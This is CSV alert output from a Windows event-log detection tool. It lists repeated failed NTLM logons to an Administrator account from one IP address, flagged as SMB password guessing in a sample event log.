2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
